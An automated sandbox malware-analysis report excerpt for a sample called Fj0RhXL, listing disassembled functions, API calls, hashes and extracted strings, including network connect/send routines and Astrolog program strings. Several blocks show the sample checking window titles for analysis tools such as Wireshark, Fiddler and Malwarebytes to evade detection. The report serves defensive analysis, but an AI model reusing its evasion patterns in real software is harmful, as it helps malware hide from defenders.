                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$_fgets_memset$_free
                                          • String ID: $Zone change error: Bad month in entry %d of zone %d: '%s'$Zone change error: Rule %d (%s) is never used by any zone change entry.$Zone change error: The %d zones have %d entries, which differs from total entry limit of %d$Zone change error: Unknown rule in entry %d of zone %d: '%s'$Zone change error: Zone %d (%s) has %d entries, which exceed total entry limit of %d$Zone change error: Zone %d unknown: '%s'$timezone changes
                                          • API String ID: 1495787504-2309610737
                                          • Opcode ID: eb1836fe1f64d1beec9bfb0d558df94152587ed5d85b091c44779ae2b1c7508a
                                          • Instruction ID: fdb2b91d70604499ce17a6959d7c68df8be39aaada047fb62b6870ad10b7df72
                                          • Opcode Fuzzy Hash: eb1836fe1f64d1beec9bfb0d558df94152587ed5d85b091c44779ae2b1c7508a
                                          • Instruction Fuzzy Hash: 25D11771A092599EEF21CF18C840FD9BBF4BF06308FA44199C4C593A41D772A9E6CFA1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _memset$swprintf$_malloc
                                          • String ID: %s %s$onlyloadinmyself$plugmark
                                          • API String ID: 1873853019-591889663
                                          • Opcode ID: f9794c229a0a789150de3c1e5fe198805e878a8e54279e7380c462d3200e0179
                                          • Instruction ID: c392e6fe79b295312112727af49d1345e9897ee815071c0cbfafd4854a831c1c
                                          • Opcode Fuzzy Hash: f9794c229a0a789150de3c1e5fe198805e878a8e54279e7380c462d3200e0179
                                          • Instruction Fuzzy Hash: 0081D1B6A40300ABFB10EF24EC86F6B77A5DF46714F084165ED195F383E671E91486B2
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 03D86503
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: VisibleWindow
                                          • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                          • API String ID: 1208467747-3439171801
                                          • Opcode ID: b0037680cbfd05093ff65a82e22fcad08c99b56e7833e6080c698a8acd00f99e
                                          • Instruction ID: 8def35370d12bcede1089e4e9cc79551b6a0dacb3eccb970bfcd3260f8ccb7a9
                                          • Opcode Fuzzy Hash: b0037680cbfd05093ff65a82e22fcad08c99b56e7833e6080c698a8acd00f99e
                                          • Instruction Fuzzy Hash: 73418066E4172066EE21FA313E07EDF315C5D628E6F0C00A6FD19EC205F666F21980FA
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _memmove$Xinvalid_argumentstd::_
                                          • String ID: invalid string position$string too long
                                          • API String ID: 1771113911-4289949731
                                          • Opcode ID: f012571de69ee2008de356dc4ea735802ed05ed37a0fcfac38dbff86137e5dd6
                                          • Instruction ID: 5fdd934cb16aa02d71500794bfa18892e61dd4f1bddff0a23d6588b27ca24aab
                                          • Opcode Fuzzy Hash: f012571de69ee2008de356dc4ea735802ed05ed37a0fcfac38dbff86137e5dd6
                                          • Instruction Fuzzy Hash: D4B15C70B00244DBDF18EF6CCC9496EB3F6EB84604B28495EE8968B785D734FD918B94
                                          APIs
                                          • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,03D95581,?,?), ref: 03D985C3
                                          • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,03D95581,?,?), ref: 03D985E2
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID:
                                          • API String ID: 1452528299-0
                                          • Opcode ID: aff1ddf45896797b4ab25601bc85ef9f4a24e324291b7748e26e919e74db2f13
                                          • Instruction ID: ff07728261f4a71b81125bb2973f2e0e88b5e8a4c045248ef73b2c5675dc8f38
                                          • Opcode Fuzzy Hash: aff1ddf45896797b4ab25601bc85ef9f4a24e324291b7748e26e919e74db2f13
                                          • Instruction Fuzzy Hash: 4481F4727002059BEB20DF65EC84B6AB7E4FB49B15F044A6AE949CB740EB71E540C7E0
                                          APIs
                                          • _memset.LIBCMT ref: 03D9730D
                                          • _memset.LIBCMT ref: 03D9731C
                                          • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 03D9733F
                                            • Part of subcall function 03D974EE: RegCloseKey.ADVAPI32(80000000,03D974CA), ref: 03D974FB
                                            • Part of subcall function 03D974EE: RegCloseKey.ADVAPI32(00000000), ref: 03D97504
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close_memset$Open
                                          • String ID: %08X
                                          • API String ID: 4292648718-3773563069
                                          • Opcode ID: 04bc451526b052ab2f4236eb0ead024ccfaba4050bd82db4e72a57dbf0d4caac
                                          • Instruction ID: cc32ed2775705f4a2764491fb870d79fafe376043614b6f3b1b2419d7e964316
                                          • Opcode Fuzzy Hash: 04bc451526b052ab2f4236eb0ead024ccfaba4050bd82db4e72a57dbf0d4caac
                                          • Instruction Fuzzy Hash: 3E5134B2910218EBEB24EF60DC85FEE7778EB48B04F404599F615A7181E774AB44CFA4
                                          APIs
                                          • socket.WS2_32(00000002,00000002,00000011), ref: 03D836E0
                                          • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 03D83719
                                          • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 03D83736
                                          • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 03D83749
                                          • WSACreateEvent.WS2_32 ref: 03D8374B
                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,03DC433C), ref: 03D8375D
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,03DC433C), ref: 03D83769
                                          • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,03DC433C), ref: 03D83788
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03DC433C), ref: 03D83794
                                          • gethostbyname.WS2_32(00000000), ref: 03D837A2
                                          • htons.WS2_32(?), ref: 03D837C8
                                          • WSAEventSelect.WS2_32(?,?,00000030), ref: 03D837E6
                                          • connect.WS2_32(?,?,00000010), ref: 03D837FB
                                          • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,03DC433C), ref: 03D8380A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                          • String ID:
                                          • API String ID: 1455939504-0
                                          • Opcode ID: cc3285bdb15f93b44d1812ff13c8291ca2daa6cf7f9f6cdd3eb201b78c5db222
                                          • Instruction ID: 43223bac120bac60e1755b116fd282a7d30dd7c891639569795d45e903fe2ccc
                                          • Opcode Fuzzy Hash: cc3285bdb15f93b44d1812ff13c8291ca2daa6cf7f9f6cdd3eb201b78c5db222
                                          • Instruction Fuzzy Hash: AE411276A00205EBE710EFA4DC89F7FB7B8EB48B10F144A1DF6159A3C4D674A905C761
                                          APIs
                                          • socket.WS2_32(00000002,00000002,00000011), ref: 02F03700
                                          • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02F03739
                                          • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 02F03756
                                          • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 02F03769
                                          • WSACreateEvent.WS2_32 ref: 02F0376B
                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,02F1D990), ref: 02F0377D
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,02F1D990), ref: 02F03789
                                          • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,02F1D990), ref: 02F037A8
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,02F1D990), ref: 02F037B4
                                          • gethostbyname.WS2_32(00000000), ref: 02F037C2
                                          • htons.WS2_32(?), ref: 02F037E8
                                          • WSAEventSelect.WS2_32(?,?,00000030), ref: 02F03806
                                          • connect.WS2_32(?,?,00000010), ref: 02F0381B
                                          • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,02F1D990), ref: 02F0382A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                          • String ID:
                                          • API String ID: 1455939504-0
                                          • Opcode ID: f3590db313adcc37e7e4df2b0dd9f987aa4e4c8f399ebbd7d9560f3b6dd34ca2
                                          • Instruction ID: 859e4d9d8880374f954550e95adb08799b4d9dc2d68b77325b5933761e18143b
                                          • Opcode Fuzzy Hash: f3590db313adcc37e7e4df2b0dd9f987aa4e4c8f399ebbd7d9560f3b6dd34ca2
                                          • Instruction Fuzzy Hash: 964151B1A40209ABE714DFA4DC89F7FB7B8EB89750F504519FB11A72C0C771A914DB60
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf
                                          • String ID: %s midpoint %s in %s: The merging of %s's$%s, and$%s.$Most often this manifests in an independent, backward, introverted manner.$Person1$Person2$very$with %s's
                                          • API String ID: 1467051239-2378394534
                                          • Opcode ID: eb3f9f4ac1300ce233dfc6b986b44cc31e935df4445f8740c3a5842f05841cdd
                                          • Instruction ID: 3b2b326aff2d88f14b46154671d520303e4f55a3afe14c0a612337c31b8dbf7e
                                          • Opcode Fuzzy Hash: eb3f9f4ac1300ce233dfc6b986b44cc31e935df4445f8740c3a5842f05841cdd
                                          • Instruction Fuzzy Hash: 87412371A00018DBDB20EB58CDC5FEC7775AB56308F450092D0C067A64CBBAD9A98F67
                                          APIs
                                          • CheckDlgButton.USER32(?,00000506,00000000), ref: 6C3AAE00
                                          • CheckDlgButton.USER32(?,00000506,00000001), ref: 6C3AAE1B
                                          • IsDlgButtonChecked.USER32(?,00000506), ref: 6C3AAE33
                                          • CheckDlgButton.USER32(?,00000506,00000001), ref: 6C3AAE41
                                          • GetDlgItemTextA.USER32(?,0000042E,?,000000FF), ref: 6C3AAF15
                                          • IsDlgButtonChecked.USER32(?,6C45259D), ref: 6C3AAF89
                                          • EndDialog.USER32(?,00000001), ref: 6C3AAFBF
                                          • CheckDlgButton.USER32(?,00000506,00000000), ref: 6C3AB02B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Button$Check$Checked$DialogItemText
                                          • String ID: angle$color$orb
                                          • API String ID: 1015435179-3662719913
                                          • Opcode ID: 576249aa3929325efe10c96b3a7fbdfc38a83ed65d43e97b265718bf93bf2d48
                                          • Instruction ID: 59109febceef47fa8e501e1f486f605a73b15f924211a0650c051d8424b5e271
                                          • Opcode Fuzzy Hash: 576249aa3929325efe10c96b3a7fbdfc38a83ed65d43e97b265718bf93bf2d48
                                          • Instruction Fuzzy Hash: D7810572108305AFEB15DF91C888FAA77FCFB46319F10491EF59182580EB75946ACF62
                                          APIs
                                          • GetLocalTime.KERNEL32(?,90594F2A), ref: 03D95718
                                          • wsprintfW.USER32 ref: 03D9574F
                                          • _memset.LIBCMT ref: 03D95767
                                          • _memset.LIBCMT ref: 03D9577A
                                            • Part of subcall function 03D89520: lstrlenW.KERNEL32(?), ref: 03D89538
                                            • Part of subcall function 03D89520: _memset.LIBCMT ref: 03D89542
                                            • Part of subcall function 03D89520: lstrlenW.KERNEL32(?), ref: 03D8954B
                                            • Part of subcall function 03D89520: lstrlenW.KERNEL32(?), ref: 03D89556
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 03D9587E
                                          • Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 03D9592E
                                          • CloseHandle.KERNEL32(?), ref: 03D9596A
                                            • Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC
                                            • Part of subcall function 03D943F0: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,90594F2A,00000000,74DF2EE0,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9,00000000), ref: 03D94433
                                            • Part of subcall function 03D943F0: InitializeCriticalSectionAndSpinCount.KERNEL32(03D98D59,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D944D2
                                            • Part of subcall function 03D943F0: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D94510
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
                                          • String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
                                          • API String ID: 1254190970-1225219777
                                          • Opcode ID: df05395b18f9d8cc53e607d6be761c35e067ced11710256a77c38aa7873ddea2
                                          • Instruction ID: 1fac78186a43739020e885042780303ca90ec037b913abe536f9d8b42270dc53
                                          • Opcode Fuzzy Hash: df05395b18f9d8cc53e607d6be761c35e067ced11710256a77c38aa7873ddea2
                                          • Instruction Fuzzy Hash: FF6174F2504340EFE761EF64DC80AAFB7E9EB89614F004A2EF5D986240E7349544CBA2
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4_sprintf
                                          • String ID: %02d"$%c%1.4f$%c%1.7f$%c%2.3f$%c%2.6f$%c%2d%c%02d'$+ 0:00'
                                          • API String ID: 4172657630-3008370106
                                          • Opcode ID: 88f3e14b38c28ddab9174bc0d5d9ae3ca2222f479f502cd701d2e07cbde9a290
                                          • Instruction ID: 3ef473cfcf29b2ee7920bb373f686cdbbdbff3f86c3d0ec53f936e4f1f077159
                                          • Opcode Fuzzy Hash: 88f3e14b38c28ddab9174bc0d5d9ae3ca2222f479f502cd701d2e07cbde9a290
                                          • Instruction Fuzzy Hash: 7E3146B3211908A7DB14AF01E815FEA3F7CEF46358F128259F88849940CB39C995CBA6
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _fprintf
                                          • String ID: %d %d %d %d %d %d$%s$DW#%d$GrayN %d$Maize$Rgb %d %d %d
                                          • API String ID: 1654120334-1105507515
                                          • Opcode ID: e91846658bbdb35f24bacd3070e4648530a4a99a4c788e4b652f2f7f49aea54f
                                          • Instruction ID: 12477903ba99b7b4e7799a771dcb6920fee1b391c62446c2b8a66b8d62f84229
                                          • Opcode Fuzzy Hash: e91846658bbdb35f24bacd3070e4648530a4a99a4c788e4b652f2f7f49aea54f
                                          • Instruction Fuzzy Hash: 3921D8B2B54620A5D748AB0D5C84F3F72B8D78B70CB12841EF49993D44E325AD85DEA3
                                          APIs
                                          • EndDialog.USER32(?,00000001), ref: 6C3ADD13
                                          • _sprintf.LIBCMT ref: 6C3ADD37
                                          • SetDlgItemTextA.USER32(?,000004D5,?), ref: 6C3ADD52
                                          • _sprintf.LIBCMT ref: 6C3ADD65
                                          • SetDlgItemTextA.USER32(?,000004D6,?), ref: 6C3ADD7A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ItemText_sprintf$Dialog
                                          • String ID: %s version %s for %s Windows$32 bit$7.10$Astrolog$October 2020$Released %s
                                          • API String ID: 3095657542-1244327326
                                          • Opcode ID: 7ff217e3a58f5301979e5c3230d8163b3584706ba5fffb17fbe0b9e541011c0b
                                          • Instruction ID: 2cf81f47841b02f206bac722a6671b2d19c2b9de5fe369df8eeb79862d91dbf1
                                          • Opcode Fuzzy Hash: 7ff217e3a58f5301979e5c3230d8163b3584706ba5fffb17fbe0b9e541011c0b
                                          • Instruction Fuzzy Hash: BE11A0B29801486BCB00EF64CC85EEE73BCEF15318F100862FA55E2940D7F4A595CE91
                                          APIs
                                          • Sleep.KERNEL32(00000064), ref: 03D84588
                                          • timeGetTime.WINMM ref: 03D845A9
                                          • GetCurrentThreadId.KERNEL32 ref: 03D845C9
                                          • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 03D845EB
                                          • SwitchToThread.KERNEL32 ref: 03D84605
                                          • send.WS2_32(?,03DB5318,00000010,00000000), ref: 03D8465B
                                          • SetEvent.KERNEL32(?), ref: 03D84679
                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 03D84684
                                          • WSACloseEvent.WS2_32(?), ref: 03D84692
                                          • shutdown.WS2_32(?,00000001), ref: 03D846A6
                                          • closesocket.WS2_32(?), ref: 03D846B0
                                          • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 03D846E9
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSleepSwitchTimeclosesocketsendshutdowntime
                                          • String ID:
                                          • API String ID: 3362159456-0
                                          • Opcode ID: 4456cb75503a4550656531170ef5987071d4fb4ab8800ddf18a89dbdf6d7d4c6
                                          • Instruction ID: 4d5ecd4e1fe76af8002ce289eb98253813f2ba5833470c2c0860936e1625dc9a
                                          • Opcode Fuzzy Hash: 4456cb75503a4550656531170ef5987071d4fb4ab8800ddf18a89dbdf6d7d4c6
                                          • Instruction Fuzzy Hash: B741AD72600616EBC724FF66D889BAAF779FF44B10F084618E5018A684DB74F591CBE0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
